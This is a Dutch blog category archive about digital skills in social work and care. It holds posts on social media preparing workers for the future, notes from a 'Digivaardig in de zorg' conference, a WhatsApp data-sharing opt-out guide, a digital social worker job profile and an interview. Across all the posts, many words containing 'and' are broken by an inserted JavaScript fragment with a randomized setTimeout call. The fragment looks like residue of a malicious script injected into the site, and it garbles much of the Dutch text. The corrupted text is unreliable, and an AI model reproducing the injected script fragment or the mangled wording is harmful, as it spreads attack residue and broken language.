Categoriearchief: Welzijn 2.0

Waarom social media je handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig voorbereiden op de toekomst?

Social media, iedereen gebruikt ze tegenwoordig. Ze zijn gemakkelijk, leuk en interessant. Dat is al jaren zo, maar toch zijn ze relatief nieuw. We hebben ze nog niet zo lang in ons leven. Toch bereiden ze ons langzaam voor op de toekomst.

Er komen nog veel gekkere dingen aan. Hele gekke dingen.
Nu al kunnen we binnenkort met zekerheid de volgende zaken op grote schaal toegepast zien gaan worden.

 • Humanoids: de eerste mensachtige robot heft in oktober 2017 het staatsburgerschap van een landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gekregen.
 • Artificial intelligence en machine learning: zelf lerende computers en apparaten die zelf leren en dat zo veel sneller doen dan een individueel mens. Misschien krijgen we straks rechtspraak door computers?
 • Robots: overal, altijd en veel beter dan de huidige, vaak eenzijdige klunzen die we nu kennen. Vooral ingezet in sociale contexten waar personeel en aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht schaars zijn.
 • Sensoren en domotica: in huis, op straat, in voorwerpen en apparaten. Alles zal worden gemeten en alles is met elkaar verbonden.
 • Implantaten en chips in je lijf: nu vaak alleen nog om je deur meet te openen maar straks ook om je te identificeren en te bankieren. Bijvoorbeeld ….
 • Data data data en nog eens data: door dat alles zal worden gemeten krijgen we een heleboel informatie. Die gaan we genereren, minen, analyse, doorgeven, bewerken, etc…
 • Blockchain: een door iedere belanghebbende gelijkwaardig gedeelde volgorde van omgaan met informatie. Nu staart iedereen zich blind op geldvormen zoals bitcoins. Maar dat is niet interessant. Straks kan je met blockchaintechniek dagelijkse handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelingen verrichten zoals je vliegticket boeken, een huis kopen zonder dure notariskosten en de bibliotheekboeken verlengen.
 • 3D-printen van grote objecten, maar ook van lichaamsdelen. Nu al zijn er proeven met 3D geprinte botstructuren die aanhechten aan je lichaamscellen. En levensreddende geprinte organen.
 • Om het nog gekker te maken: er zijn geruchten dat we ooit onze hersens aan “de cloud” kunnen verbinden. Stel je eens voor wat dat doet met zoiets als leren. Wanneer je niet meer je hele jeugd in de bankjes hoeft te zitten maar gewoon je hoofd inplugt en alles weet.

Wennen aan de toekomst

OK, dat is misschien wel heel ver weg. Toch denk ik dat je door nu op social media actief te zijn al een beetje went aan de toekomst, aan nieuwe technologie en aan digitaal zijn. Want zo:

 • kom je ethische vragen tegen die je straks helpen om dan verstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andige keuzes te maken.
 • loop je tegen de grenzen van de huidige techniek en van je huidige organisatie structuur aan en prikkel le jezelf andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere vormen te zoeken, vaak in netwerkverbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, co-creatie en delen.
 • leer je een stukje van je werk m.b.v. technologie uit te voeren en daar nog wel zelf de regie op te hebben.
 • wordt je bekend met het hanteren van nieuwe apparatuur. Smartphones, tablets, watches. En sinds kort het bedienen van VR brillen en straks van de robots die je collega’s zullen zijn.
 • en leer je de digitale basisvaardigheden die je straks nog veel meer nodig gaat hebben.

Kortom, wil jij je straks aan kunnen passen aan de toekomst, begin dan nu vast met wat voorhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden is. Zet jezelf niet op achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, pas social media nu in je werk toe.

Ben jij klaar voor de toekomst in zorg en welzijn? Klik hier voor de succesvolle en inspirerende workshop.

Ben jij klaar voor de toekomst in zorg en welzijn? Klik hier voor de succesvolle en inspirerende workshop.

Lees hoe jij je kan voorbereiden: Ben jij er klaar voor? 

BewarenBewaren

Waarom in 2025 digivaardig sociaal werk?

Waarom in 2025 digivaardig sociaal werk?Over 7 jaar moeten alle sociaal werkers digivaardig zijn. Dat is mijn streven. Of … liever al veel eerder. Want haast is geboden. Maar waarom eigenlijk?

We leven in een steeds complexere verdigitaliseerde wereld. De systeemwereld rukt enorm op. Zonder digitale vaardigheden is deelnemen aan de participatiemaatschappij een zware opgave. Digitale (overheids-)diensten maken het leven complexer dan we hadden gedacht. Niet iedereen kan mee komen. En ontwikkelingen gaan nog steeds razend snel.

Ondersteunen

Ook voor sociaal werkers zelf is “meekomen” geen vanzelfsprekendheid. Toch wordt van hen verwacht dat zij andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen daarin kunnen ondersteunen. Sociaal werkers dienen hun soms kwetsbare doelgroepen en omliggende (informele) netwerken daarin de weg te kunnen wijzen en bij te kunnen staan. Om te werken aan de inclusieve samenleving, juist in een tijd dat polarisatie oprukt. Digitaal zijn sociaal werkers in staat om dicht bij de doelgroep te staan, deel uit te maken van de levenssfeer van de doelgroep.

Aansluiten

Bovendien biedt digitaal werken de kans aan te sluiten bij groepen die minder vanzelfsprekend tot de doelgroep behoren maar die wel voor doelgroepen van waarde kunnen zijn. Sociaal werkers kunnen online deel uit maken van initiatiefrijke (lokale) netwerken van inwoners en ondernemers die werken aan maatschappelijke thema’s. En zo gezamenlijk optrekken.

Communiceren

Sociaal werkers vinden hun werk soms zo vanzelfsprekend dat ze er niet over communiceren. “Ik ben als sociaal werker geboren.” Sociaal werkers beseffen onvoldoende dat de buitenwereld, waaronder beslissers / financierders, een vertekend beeld heeft van het werk en daardoor een verkeerde weging geeft aan het werk. Door het vertellen van de verhalen krijgen buitenstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders een beter beeld en dat kan gevolgen hebben voor het wel of niet krijgen van subsidie. Social media bieden vollop kansen om aan storytelling te doen. Het sociale vak heeft baat bij een sterkere profilering. Al was het maar om nieuwe medewerkers aan te trekken.

Organiseren

Ook de wijze waarop werk in deze tijd is georganiseerd leunt sterk op ICT en online diensten. Dat begint al bij intern communiceren, rapporteren en tijdschrijven. Maar ook steeds meer als het gaat om samenwerken. Apps en tools worden ingezet om het werk uit te voeren. Registratiesystemen leveren data over kwetsbaren aan de overheid. Sociaal werkers kloppen die informatie in, maar weten niet altijd waar die data heen gaat en wie toegang heeft of tot welk moment data bewaard blijft. De doelgroep zelf heeft het recht daar vragen over te stellen.

Balans

Voor het ondersteunen, aansluiten, communiceren en organiseren, worden smartphones en tablets ingezet. Apparaten waarmee deze twee taken moeiteloos in elkaar over zijn gaan lopen. Het werk wordt op straat, in de winkel, in de bus, op een bankje, maar ook net zo makkelijk thuis en buiten werktijd, uitgevoerd. Een 9 tot 5 mentaliteit is hiermee achterhaald en werkers moeten steeds weer hun eigen grenzen bewaken. Deze mobiliteit vraagt daarnaast zorgvuldigheid in het omgaan met informatiedragers.

Digivaardig

Dat alles betekent dat sociaal werkers aan hun eigen digitale vaardigheden zullen moeten gaan werken. Sociaal werkers beseffen gelukkig steeds beter waarom digitalisering ook van hen een en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander vraagt. Wil je meer weten over Welzijn 3.0, de nieuwe vorm van sociaal werk waarin digivaardigheid geborgd is? Help je mee vóór 2025 alle sociaal werkers digivaardig te krijgen? Misschien door te beginnen bij jezelf?

Kijk dan op https://www.welzijn30.nl

Vriendelijke groeten,

Hans Versteegh

Lees meer over digivaardigheid ontwikkelen

Aantekeningen werkconferentie digivaardig in de zorg

Werkconferentie “Digivaardig in de zorg”

Door VWS en ECP, donderdag 29 juni, Utrecht

Geeft de standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van zaken op dit moment weer m.b.t. het thema digitalisering van het sociaal domein, omdat dit overeenkomt met de ontwikkelingen in de zorg. Een en al inspiratie.

Hashtag om terug te lezen: #zorgdigivaardig

Platform voor de informatiesamenleving

Coalitie Digivaardig

Onderzoekt

 • e-skills voor zorgprofessionals
 • Digivaardig en de arbeidsmarkt
 • Uitslagen zelf-test
 • Rol van de manager / bestuurder

Bewustwording / activering

2017: digivaardig in de zorg: nodig en zichtbaar

Groei belang e-health en digivaardigheden in de zorg

 • Voelbaar en zichtbaar bij zorginstellingen, zorgprofessionals
 • Cijfers e-health monitor NICTIZ
 • Brede aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht e-health: bv zie #ehw17
 • Brede aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht digitale vaardigheden (OCW/BZK/EZ)
 • Groei coalitie dv in de zorg
 • (Aangenomen) motie Tweede Kamer op dit gebied
 • VWS: kamerbrief 20 juli 2017: digitale vaardigheden en zorginnovatie

Naar een programma digivaardig in de zorg voor de komende (kabinets-)periode

Bron: latulippe.et.al. JMRI 2017

 • 90% van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders heeft internet, maar dat geld niet voor mensen binnen zorginstellingen
 • 40% van de kwetsbaren heeft geen internet
 • 25% hiervan vindt internet moeilijk
 • 30% heeft moeite met het verwerken van informatie
 • 50% heeft moeite met eigen regie

Zorgverleners zien meer mogelijkheden voor e-health dan cliënten.

Van de cliënten geeft 50% aan er behoefte aan te hebben. Maar:

 • De techniek moet goed werken
 • De kennis en kunde van gebruikers moet op pijl zijn
 • Het moet goed aangeboden worden
 • Vanuit krachtige organisaties
 • Met een faciliterende context, denk aan wetgeving en financiering

Wie gaat deze mensen bij de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and nemen?

En wie de zorgprofessionals en de mantelzorgers?

Betere bij- / nascholing is nodig

Betere internetverbindingen binnen de zorg

Bij de doelgroep passende toepassingen

DIGITALE VAARDIGHEDEN

Aanwijsbare doelgroepen:

Burger, Patiënt, Mantelzorger — Zorgmedewerker — ICT-er in de zorg — Leidinggevenden — opleiding / onderwijs

Vanuit de Burger, Patiënt, Mantelzorger

Missie: Alle patiënten /mantelzorgers / naasten voldoende digivaardig

Voorbeeld: patiënten dossiers, beeldbellen, lab-waarden diabetes, etc.

Mogelijke activiteiten:

 • Methode om vast t stellen of de client over de vaardigheden beschikt / MBO
 • Coaching materiaal voor zorgverlener als digi-coach
 • E-health modules in bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande computercursussen voor ouderen, gehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andicapten, kwetsbaren
 • Mantelzorger als digi-coach: ondersteuningsmateriaal of ondersteuning
 • Aansluiten bij patiënts-included
 • Doorverwijsplek digitaal hulplijn van BZK / (zorg specifiek) digivaardig te maken

De burger wil op het juiste moment de juiste informatie via het juiste kanaal.

Bijvoorbeeld een Whatsapp als herinnering voor een afspraak, een filmpje over een behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling en over de weg in het ziekenhuis. Aangeboden door een partij die vertrouwen geeft.

Er is behoefte aan:

 • Zorgverleners met oog voor behoeften
 • Begrijpelijke zorg
 • Een keurmerk
 • Een overzicht van beschikbare tools
 • Een checklist voor digitale tools

Vanuit de zorgprofessional

Missie: alle zorgprofessionals voldoende digivaardig,

Zorgprofessionals als coach van cliënten die zelf zoeken welke ICT / digitale tools nodig zijn om gezond te blijven en / of beter te worden. Niet zorgen voor maar mensen die zelf hun zorg vorm geven. Mensen kunnen zo ook uit de zorg gehouden worden (population health management)

Hoe sluit je als professional aan op wat mensen zelf in huis hebben gehaald? Hoe hou je het veilig?

De zorgketen gaat op de kop. Terwijl de gevestigde orde zich moet houden aan wetten en standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaarden als ISO en HL7Fire etc.

Voorbeeld: basisvaardig (EPD), interactie patiënt (beeldbellen), innovatie (andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders werken)

Mogelijke activiteiten:

 • Bewustwordingscursus slimmerwerkenindezorgin1minuut.nl verder verspreiden
 • Zelf test uitbreiden en breder verspreiden
 • Digitale vaardigheden in BIG-opleidingen
 • Ondersteuning voor super-users: opleiding, begrip van rol, samenwerking met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, connectie ICT-afdeling, etc.

Er is behoefte aan:

 • Kennis en bewustwording van ICT / digitale mogelijkheden
 • Kennis om er gebruik van te kunnen maken
 • Ervaren wat het is
 • Tijd om te proberen
 • Technologie die aansluit bij de professional
 • Keep It Simple Stupid (KISS)
 • Integratie in het dagelijkse vak
 • Deskundigheidsbevordering
 • Herhalen en coachen
 • Coaching: in korte perioden van herhaling om kennis te laten beklijven. “Ik kan het niet de hele dag.” “Ik moet een knop omzetten.”
 • Borgen in visie en beleid

Vanuit de ICT-professional

Missie: zorgen voor voldoende ICT-ers in de zorg, die optimaal binnen hun nieuwe rol functioneren

Voorbeeld: helpen zorgprofessionals, helpen managers, nieuwe ICT mogelijkheden, samenwerking over de grenzen heen

Mogelijke activiteiten:

 • Met de beroepsgroep een Body of Knowledge en Skills opzetten voor de zorginformatieprofessional 3.0
 • Bewustmakingscampagne vanuit het begrip zorginformatieprofessional 3.0
 • Enthousiasme professionals over het vak overbrengen aan jongeren om tekort te voorkomen (geef ICT door variant)

Vraagstuk: kan de zorgprofessional praten met de ICT-er? En kan die praten met de klant?

Dit is nodig:

 • Business ICT alignement, goede ICT die effectief, veilig en efficiënt is, plus vaardigheden en skills.
 • In de zorg de juiste ICT ondersteuning leveren
 • Een nieuwe rol voor ICT-ers
 • Meer rond communiceren en bruggen bouwen dan fysiek bouwen
 • Geen aparte discipline maar onderdeel van het bedrijfsproces

Vanuit leidinggevenden / bestuurders

Missie: alle leidinggevenden in de zorg voldoende digivaardig

Voorbeeld: andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere competenties medewerkers, standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaardisatie, uitwisseling, etc.

Mogelijke activiteiten:

 • Een campagne waarin rolmodellen, exemplarische management vraagstukken issues over managementdilemma’s wordt gestimuleerd
 • Leercirkels / leertafels waarin managers en bestuurders hun dilemma’s bespreken
 • E-health leiderschap / management in opleidingen voor zorgmanagement

Er is behoefte aan:

 • Een visie en strategie rond digitalisering
 • Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaarden
 • Zorgverzekeraars kunnen aansporen en moeten ruimte bieden
 • Cultuurverandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andering
 • Implementatie in de eigen organisatie
 • Een groter kennisniveau van bestuurders
 • Aansluiten bij landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke bewegingen

Vanuit opleidingen

Missie: zorgopleidingen hebben e-health geïncorporeerd in hun curriculum

Voorbeeld: in opleidingen MBO-V, HBO-V etc. ook e-health in technische opleidingen

 • Concrete aanbevelingen op et terrein van e-health in zorgonderwijs concreet uitwerken
 • Concrete invulling van / samenwerking met zorgpacten
 • Vooroplopende opleidingen een podium geven om hun voortrekkersrol te vervullen, bijvoorbeeld door een conferentie voor zorgopleidingen te organiseren

Dit is nodig:

 • Inspiratie en toonaangevende voorbeelden
 • Living labs en smartlabs om te experimenteren en te leren
 • Een kennisplatform
 • Zorgprofessionals die ICT toepassen
 • Inclusief onderwijs

Wie heb je voor je en voor wie is welke digitale tool geschikt?

Beelden gebruiken, ook naar zorgverleners zelf

Perspectief (door mij geformuleerd)

Over 4 jaar hebben zorgverleners kennis van digitale mogelijkheden, scholen zij zich daarin blijvend bij op hun 24th century skills en werken zij als digi-zorgcoach naar hulp behoevenden die zelf de regie in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden (kunnen) hebben en hun eigen zorgafname vorm geven. En zijn zij bruggenbouwers naar de eigen organisatie en aanbieders.

Dus … zij geven advies en implementeren digitale zorg middelen:

“dit kan er, zullen we?”

Kijk voor inspiratie ook naar andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere sectoren zoals de veehouderij die van iedere koe precies weet hoe die er voor staat. En naar de transport sector die goederenstromen feilloos ingericht heeft.

De rol die VWS voor zichzelf ziet is:

 • Afstemmen van 4 ministeries (VWS, EZ, BZK en OCW)
 • Voorbeelden delen
 • Met als startpunt telkens de burger / de patiënt
 • Vruchtbare grond leveren voor verdere ontwikkeling
 • Schouderklopjes uitdelen

(dit viel mij eerlijk gezegd wat tegen van het ministerie, HV)

Laat Whatsapp je gegevens niet delen

Midden in de vakantie heeft WhatsApp aangekondigd data van gebruikers met Facebook te gaan delen voor advertentiedoeleinden. Ondanks de toezegging twee jaar geleden, bij de overname door Facebook, dat dit nooooooiiiiiit zou gebeuren. Sneaky en onbetrouwbaar. Je kan nog voorkomen dat dit gebeurt. Maar dan moet je wel snel zijn. Je moet binnen 30 dagen actie ondernemen.

WhatsApp gaat jouw data en telefoonnummer met Facebook delen. Ze willen die informatie alleen gebruiken voor gerichter adverteren. Gelukkig kan je WhatsApp tegenhouden om binnenkort je informatie te delen. Je hebt daar maar een maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and de tijd voor, en dan nog zal sommige informatie toch met Facebook worden gedeeld. Je telefoonnummer wordt sowieso aan Facebook gegeven, maar die zal (nog niet) worden toegevoegd aan je Facebook profiel.

Er zijn twee manieren om jezelf toch een beetje te beschermen.

De eerste manier is bij het accepteren van de nieuwe gebruikersvoorwaarden. Die voorwaarden krijg je deze dagen te zien wanneer je Whatsapp gaat gebruiken. Onder de knop ‘akkoord’ staat de optie om meer te lezen. Klik daar op en accepteer (nog) niet. Je  krijgt wat tekst maar ook een een schakelaar te zien: zet die uit wanneer je je nummer niet wil delen. WhatsApp vraagt dan of je het zeker weet, daarna hoef je niks meer te doen en gaat je data niet gedeeld worden met Facebook.

De tweede manier is voor wanneer je die voorwaarden al geaccepteerd hebt. Ook dan kan je die toestemming toch nog intrekken. Ga naar de instellingen van WhatsApp. Klik op ‘Account’ en op de tijdelijke optie ‘Deel mijn informatie’. Schakel je die binnen dertig dagen na het accepteren van de voorwaarden uit. Zet de schakelaar dus op grijs, inplaats van groen.

Na die 30 dagen ga je dus automatisch akkoord, wanneer je geen actie onderneemt en kan je de toestemming nooit meer ongedaan maken.

Whatsapp niet delen voorwaarden 2016

Bron foto en inspiratie voor dit bericht: https://www.bright.nl/nieuws/zo-voorkom-je-dat-whatsapp-je-data-met-facebook-deelt

Functieprofiel digitaal sociaal werker

Wat is het functieprofiel van een digitaal sociaal werker / opbouwwerker / sociaal makelaar? Wie zorgt dat mensen digitaal geletterd zijn? Dat de digitale kloof kleiner wordt. Dat digitaal burgerschap niet bij een loze kreet blijft? Ik heb daar wel een idee bij. De digitaal sociaal werker / opbouwwerker / sociaal makelaar.

Wat is dat dan voor iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and? Om dat op een rij te zetten heb ik onderstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and functieprofiel opgesteld.

Functieprofiel digitaal sociaal werker

Doel:
 • Bewoners worden online verbonden, A. aan elkaar (community building), B. aan organisaties, instellingen , diensten, verenigingen en bedrijven die voor hen relevant zijn (maatschappelijke participatie), C. aan de overheid (eParticipatie)
 • Bewoners krijgen de vaardigheden om met de computer, social media en digitale diensten om te gaan, en worden daarin gefaciliteerd en ondersteund.
 • Breed geldende welzijnsdoelen.
Taak: 
 • Binden en verbinden, virtuele samenlevingsopbouw
 • De weg wijzen binnen een zich sterk en snel ontwikkelende virtuele wereld
 • Het ontstaan van online community’s stimuleren die als gezamenlijk kenmerk hebben dat over en weer  communicatie en uitwisseling mogelijk is (Web 2.0)
 • Online en IRL ontmoetingen stimuleren en beide naast elkaar laten bestaan met een duidelijke meerwaarde voor beiden
 • Bewoners facilliteren, trainen, coachen en digitale vaardigheden bijbrengen op een wijze zodat zij die kennis door kunnen geven aan andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, waarmee de eersten vrijwilligers worden
 • Communitys managen, maar beter nog is bewoners in staat stellen dat zelf te doen
 • Innovatie stimuleren, nieuwe diensten ontwikkelen en toepasbaar maken
Positie:

HBO (bv CMV, ICT, Marketing, SPH, MWD, Social Management etc …)

CAO Welzijn, minimaal schaal 8 of zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig ondernemer

Dubbelfunctie:

Het is wellicht mogelijk dat deze functionaris ook de eigen organisatie adviseert danwel stimuleert bij invoering en gebruik van digitale middelen. Om ook intern community’s van collega’s op te zetten, vormen van kennis ontwikkelen, delen en vasthouden voorstelt en implementeert, plus de interne communicatie  digitaliseert.

 Competenties en random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andvoorwaarden:
 • Mobiel uitgerust en flexibel in tijd en plaats (Het Nieuwe Werken)
 • Out of the box denkend
 • Pioniersmentaliteit
 • Communicatief sterk
 • Inspirerend
 • Netwerker en teamspeler
 • In staat mensen over drempels te helpen en in hun kracht te zetten
 • Benaderbaar
 • Met een dosis lef om soms tegen de stroom in te kunnen gaan
 • Doelgericht en vastberaden
 • Humor en relativerend vermogen
 • Goed op de hoogte van actuele ontwikkelingen binnen digitalisering en de online wereld
 • In staat de klant (bewoner) de regie te geven en op afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and te sturen, het proces te bewaken
 • Op het juiste moment weten terug te treden
 • Welzijnsachtergrond is een pre
 • Met een brede betrokkenheid bij de doelgroep en digitale mogelijkheden (vanzelfsprekend)

Online basis training

Is dit iets voor jou? Maar ben je nog niet zo ver? Dan is de online basistraining voor sociaal werkers wellicht een mooi begin. Voor 97,- euro leer je snel hoe jij online werken een plek kan geven in je eigen dagelijkse werkzaamheden. Zodat je van daaruit ook andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen op weg kunt helpen. In je eigen tempo en je kan beginnen wanneer jij wil. Met als bonus een certificaat en recht op Registerpunten. Klik hier

☎ +31644062029 / info@welzijn30.nl / Hans Versteegh
Heb je verder nog  iets op af aan te merken op dit functieprofiel. Laat het weten en reageer!
Zie ook: manifest
Digitaal opbouwwerk in de praktijk? Klik hier
Wat is het functieprofiel van een digitaal sociaal werker / opbouwwerker / sociaal makelaar? Wie zorgt dat mensen digitaal geletterd zijn? Dat de digitale kloof kleiner wordt. Dat digitaal burgerschap niet bij een loze kreet blijft?

BewarenBewaren

BewarenBewaren

BewarenBewaren

BewarenBewaren

De mensen achter Welzijn 2.0, Pascal van Wanrooy


Wie zijn de mensen achter Welzijn2.0?
Deze reeks ontmoetingen laat de mensen zien die de term Welzijn 2.0 inhoud geven. De zichtbare en de minder zichtbare. Wie zijn het, wat doen ze, wat drijft hen? Hieronder leest u de eerste ontmoeting met:  
Pascal van Wanrooy (1969) is werkzaam als ondersteuner bij Alleato, het Utrechtse provinciaal kennisinstituut voor zorg en welzijn. Pascal heeft o.a. als aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andachtsveld social media en adviseert / begeleidt verschillende zorg -en welzijnsinstellingen in de regio Utrecht.
Social media leeft in deze regio. Vele organisaties willen er wat mee maar zij zijn nog vaak zoekende. Men heeft geen beeld bij welke vormen er bestaan, geen beeld van het proces om te komen tot nuttige social media toepassingen. Kortom, enig advieswerk is welkom. Pascal is betrokken bij trajecten binnen de Gemeente Utrecht, Portaal, Puls, Zuwezorg, Abrona, Reinaerde, Stichting Welzijn Amersfoort (mijn club), etc. Mogelijk gemaakt door een stimuleringsbijdrage vanuit de Provincie Utrecht.
In de zonnige achtertuin van Alleato in het centrum van Utrecht vroeg ik Pascal naar zijn ideeën rondom social media. Met zijn achtergrond als bioloog stelt hij dat de mens een sociaal wezen is, dat zich beter voelt als het samen werkt met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen. Je voelt je immers veiliger in een omgeving waar je de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander kent, dan in een omgeving waar de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander een onbekende voor je is. Samenwerken vergroot dus je gevoel van veiligheid.
Als voorbeeld haalde hij een onderzoek met apen aan. Een deel van de apen zat in hokjes naast elkaar. Die konden elkaar dus wel horen en ruiken maar niet zien. Een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere groep apen was wel in staat elkaar te ontmoeten en aan te raken. De eerste groep was beduidend stressvoller dan de tweede. “Vervang nu die apen eens door mensen en de zie de hokjes als een flatgebouw,” opperde Pascal.
Naast het streven je veiligheid te vergroten heeft ieder mens ook een intrinsieke motivatie om iets voor een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander te doen. Een soort sociale verplichting die je voelt. Die wederkerigheid zit in ieder van ons. Op basis daarvan heeft Pascal in Utrecht Zuid het project Tijd voor elkaar opgestart. Geïnspireerd op Marktplaats maar dan aangevuld met een vorm van burenhulp. Diensten worden niet verkocht maar geruild. Interactie die betekenisvol is voor de gever en de ontvanger. Mensen die aarzelen, kunnen aankloppen bij een ondersteuner (sociaal makelaar).
Neem die oudere mevrouw die opgenomen werd in het ziekenhuis en iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zocht die haar planten water wilde geven. Via Tijd voor elkaar bleek dat vlak bij haar een man woonde die dat wel wilde doen. Ze kenden elkaar niet, ook al woonden ze ”om de hoek”. Maar het tot standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gebrachte contact beviel beiden uiteindelijk zo goed dat hij nu ook de tuin van mevrouw bij houdt.
Direct om hulp vragen of voor hulp aanbellen is vaak een hoge drempel. Op het internet de vraag stellen is open, je bent  vrij om te reageren of te negeren, je bent tot niets verplicht. Daar geld niet dat je moet helpen, maar “Ik wil en ik kan je helpen, want andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders was ik niet op deze site aan het kijken.” Dat is volgens Pascal ook de essentie van WEB 2.0; ik wil, niet ik moet.
Welzijn verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andert. Mensen verbinden zich op diverse manieren, in verschillende omgevingen, in andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere netwerken en op diverse momenten. Mensen gaan meer en meer hun eigen welzijn vormgeven. Los van instellingen, procedures, regels. De systeemwereld verliest terrein aan de leefwereld. Social media maken dat mogelijk en doen dat soms erg krachtig. Pascal noemt een voorbeeld van een leerling die voor zijn maatschappelijke stage in een verzorgingshuis een mevrouw trof die graag eens naar het park zou gaan. Hij maakte dat in zijn schoolnetwerk op Hyves kenbaar. Mede studenten pikten dit op en binnen vier dagen ging een groep leerlingen en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere mensen die zich betrokken voelden met de bewoners van het verzorgingshuis een dagje naar het park.
Welzijnswerkers kunnen dit soort dingen onverklaarbaar en wellicht schokkerend vinden. “Waar zijn wij mee bezig, waar zijn die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen mee bezig?” Ze vinden het vervolgens maar eng en onbegrip overheerst. Volgens Pascal is dat slechts een kwestie van het ontbreken van basisvaardigheden op de computer bij veel welzijnswerkers. Een kennisachterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and dus.  Werkers moeten social media gaan ervaren. Ga met iets beginnen. Vaak gebruiken ze privé al You Tube, fotosites, prijsvergelijkingsites, Marktplaats enz., maar beseffen ze niet dat dit vormen van social media zijn. De nieuw lichting welzijnswerkers die afstudeert is al veel bekender met deze materie. De achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zal dus worden ingelopen.
Voor diegene die al wel overtuigd is van het nut van inzet van social media binnen welzijn heeft Pascal nog wel een aantal tips. Geloof er in, inspireer andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, streef soms naïef je doelen na, ook al is dat misschien niet het meest realistisch op dat moment en deel je kennis op basis van vertrouwen. Sociaal zijn in het dagelijks leven (in real life, IRL) of binnen WEB 2.0, het is hetzelfde proces. Je stapt uit de anonimiteit, je laat jezelf zien (profiel en foto)en gaat verbindingen / relaties met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen aan. Wees niet bang, begin!
U bent van harte welkom om uw reactie hieronder achter te laten.